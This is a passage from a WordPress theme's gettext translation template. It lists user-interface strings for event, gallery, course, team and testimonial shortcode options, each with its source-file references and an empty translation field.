framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:66 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:6 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:26 msgid "Two" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:12 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:12 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:8 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:7 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:6 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:17 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:81 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:100 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:80 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:73 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:13 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:67 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:7 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:27 msgid "Three" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:13 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:13 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:9 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:8 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:7 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:18 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:82 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:101 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:81 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:74 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:14 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:28 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:74 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:8 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:28 msgid "Four" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:15 msgid "Select item columns on row ." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:20 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:26 msgid "-All Event Categories-" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:24 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:30 msgid "-All Event-" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:33 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:36 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:42 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:11 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:11 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:13 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:18 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:22 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:25 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:54 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:56 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:50 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:29 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:49 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/vc_options.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:20 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:41 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:40 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:45 #: framework-customizations/theme/options/page-404-settings.php:25 #: framework-customizations/theme/options/page-header-settings.php:22 #: framework-customizations/theme/options/page-options.php:75 msgid "Layout" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:37 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:41 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:23 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:26 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:30 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:47 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:76 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:27 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:46 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:45 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:50 msgid "Choose layout will be displayed." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:44 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:96 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:142 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:202 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:126 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:186 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:118 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:178 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:56 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:54 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:136 msgid "Display By" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:47 msgid "Choose team category or special events to display" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:48 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:70 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:92 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:100 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:122 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:144 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:135 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:146 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:172 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:195 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:206 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:232 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:255 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:130 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:156 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:179 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:190 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:216 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:239 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:122 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:148 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:171 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:182 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:208 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:231 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:180 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:193 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:138 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:147 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:111 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:120 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:60 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:82 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:104 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:58 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:80 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:102 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:140 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:162 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:185 msgid "Filter" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:58 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:110 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:160 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:220 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:144 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:204 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:136 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:196 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:36 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:70 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:68 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:150 msgid "Add Category" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:61 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:163 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:223 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:147 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:207 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:139 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:199 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:39 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:73 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:71 msgid "Choose special category to filter" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:65 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:117 msgid "Choose Event Category." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:74 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:126 #: framework-customizations/theme/options/template-settings.php:441 msgid "Events" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:80 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:132 msgid "Add Event" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:83 msgid "Choose special event to show" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:87 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:139 msgid "" "Default display All Event if no event is selected and Number event is empty." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:100 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:213 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:138 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-2.php:34 msgid "Show Feature Image?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:104 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:217 msgid "Choose to show or hide image." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:105 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:116 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:127 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:137 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:147 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:157 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:167 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:177 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:187 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:195 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:218 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:229 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:240 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:250 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:260 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:270 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:280 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:290 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:300 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:314 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:322 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:181 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:188 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:195 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:202 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:209 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:216 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:227 msgid "Custom Options" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:110 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:223 msgid "Show Event Label?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:115 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:228 msgid "Choose to show or hide event label." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:121 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:234 msgid "Show Event Description?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:126 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:239 msgid "Choose to show or hide event description." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:132 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:245 msgid "Show Event Speaker?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:136 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:249 msgid "Choose to show or hide event speaker." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:142 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:255 msgid "Show Event Location?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:146 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:259 msgid "Choose to show or hide event location." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:152 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:265 msgid "Show Event Time?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:156 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:269 msgid "Choose to show or hide event time." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:162 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:275 msgid "Show Event Ticket Number?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:166 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:279 msgid "Choose to show or hide event ticket number." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:172 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:285 msgid "Show Event Ticket Price?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:176 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:289 msgid "Choose to show or hide event ticket price." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:182 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:295 msgid "Show Meta Info?" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:186 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:299 msgid "Choose to show or hide event meta info." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:192 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:319 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:74 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:392 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:359 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:398 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:33 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:117 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:136 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:56 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:192 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:330 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:126 #: framework-customizations/extensions/shortcodes/shortcodes/map/vc_options.php:92 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:126 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:52 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:49 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:40 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:178 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:194 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:205 msgid "Title Color" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:194 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:321 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:76 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:51 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-2.php:42 msgid "Choose a custom color for title." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:202 msgid "Shortcode Title" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:205 msgid "Add title for shortcode." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:210 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-1.php:90 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-3.php:16 #: framework-customizations/theme/options/post-settings.php:221 #: framework-customizations/theme/options/post-settings.php:458 #: framework-customizations/theme/options/post-settings.php:549 msgid "Columns" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:214 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:89 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:200 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:213 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:260 msgid "Choose number column will be displayed." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:223 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:74 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:79 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:102 msgid "Excerpt Length" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:226 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:77 msgid "Enter number of excerpt length. Default: 15" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:231 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:43 msgid "Pagination" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:234 msgid "Choose pagination display." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:239 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:56 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:86 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:97 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:93 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:95 #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:14 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:268 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:159 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:104 #: framework-customizations/theme/options/post-settings.php:452 #: framework-customizations/theme/options/post-settings.php:543 msgid "Limit Posts" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:243 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:58 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:89 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:100 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:96 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:98 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:271 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:162 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:107 msgid "" "Add limit posts per page. Set -1 or empty to show all. The number of posts " "to display. If it blank the number posts will be the number from Settings -> " "Reading" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:248 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:62 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:100 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:102 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:94 #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:19 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:275 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:166 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:111 msgid "Offset Post" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:251 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:64 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:103 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:105 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:97 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:278 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:169 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:114 msgid "" "Enter offset to pass over posts. If you want to start on record 6, using " "offset 5" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:256 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:66 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:107 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:109 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:101 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:115 #: framework-customizations/extensions/portfolio/widgets/project/views/admin.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/vc_options.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:148 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:301 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:173 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:118 #: framework-customizations/extensions/widgets/widgets/recent-post/views/admin.php:17 msgid "Sort By" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:259 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:69 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:176 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:121 msgid "Select order to display list properties." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:266 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:329 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:68 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:115 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:114 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:116 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:108 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:53 #: framework-customizations/extensions/headers/headers/header-09/options/cart_icon.php:6 #: framework-customizations/extensions/headers/headers/header-09/options/course_category.php:20 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:44 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:43 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:17 #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:17 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:74 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:54 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:107 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:254 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:160 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:35 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:34 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:28 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:58 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:71 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:95 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:78 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:83 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:114 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/vc_options.php:80 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:238 #: 